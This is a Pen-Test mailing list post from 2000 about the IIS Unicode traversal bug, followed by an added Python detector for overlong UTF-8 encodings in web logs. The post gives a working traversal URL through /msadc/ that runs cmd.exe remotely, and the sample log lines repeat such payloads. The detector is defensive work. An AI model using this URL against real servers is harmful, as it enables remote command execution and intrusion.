Penetration Testing mailing list archives
Re: [PEN-TEST] IIS UNICODE Strings
From: Michael Owen <mowen () COSTCO COM>
Date: Mon, 30 Oct 2000 11:22:47 -0800
In our test, the InetPub directory is in logical drive D: instead of default C:. Does that matter in the above examples?
-------------------------------------
In our internal tests, it does, and the exploit won't work. BUT, if you use the /msadc/ virtual folder, it won't matter, as msadc is in c:\program files\Common\....

http://iisbox/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt /system32/cmd.exe\?/c\+dir+c:\\temp
----------------------------------
Michael Owen
Costco Wholesale
Network Security
(425) 313-2957
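
A defender-side check for the encoding seen in the URL above, added here as an example and not part of the original post: `%e0%80%af` is a three-byte overlong UTF-8 form of `/`, and the code flags any request URI whose percent-decoded bytes contain an overlong encoding of `/`, `\` or `.`, whichever virtual folder or drive is involved. The log layout, the URI field position and the sample lines are constructed assumptions.

```python
from urllib.parse import unquote_to_bytes

URI_FIELD = 4  # assumed layout: date time client-ip method uri status
MIN_CODEPOINT = {2: 0x80, 3: 0x800, 4: 0x10000}  # smallest value each length may encode

def overlong_sequences(raw: bytes):
    """Yield (offset, sequence, decoded_char) for each overlong UTF-8 form in raw."""
    i = 0
    while i < len(raw):
        lead = raw[i]
        if lead in (0xC0, 0xC1):
            size, cp = 2, lead & 0x1F
        elif lead == 0xE0:
            size, cp = 3, 0
        elif lead == 0xF0:
            size, cp = 4, 0
        else:
            i += 1
            continue
        tail = raw[i + 1:i + size]
        if len(tail) == size - 1 and all(0x80 <= t <= 0xBF for t in tail):
            for t in tail:
                cp = (cp << 6) | (t & 0x3F)
            if cp < MIN_CODEPOINT[size]:  # value fits a shorter form: overlong
                yield i, raw[i:i + size], chr(cp)
                i += size
                continue
        i += 1

def suspicious_requests(log_lines):
    """Return (uri, [decoded chars]) for URIs hiding path characters in overlong UTF-8."""
    hits = []
    for line in log_lines:
        uri = line.split()[URI_FIELD]
        found = [ch for _, _, ch in overlong_sequences(unquote_to_bytes(uri))
                 if ch in "/\\."]
        if found:
            hits.append((uri, found))
    return hits

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    "2000-10-30 11:20:01 192.0.2.10 GET /default.asp 200",
    "2000-10-30 11:21:13 192.0.2.77 GET /msadc/..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe 200",
    "2000-10-30 11:21:40 192.0.2.77 GET /scripts/..%c0%af../winnt/system32/cmd.exe 404",
    "2000-10-30 11:22:05 192.0.2.10 GET /docs/%e0%a4%b9.htm 200",  # legitimate 3-byte character
]

if __name__ == "__main__":
    for uri, chars in suspicious_requests(SAMPLE_LOG):
        print(f"overlong encoding of {chars!r} in {uri}")
```

The check only sees what the log source records, so it needs the request URI as received, before the server normalises it.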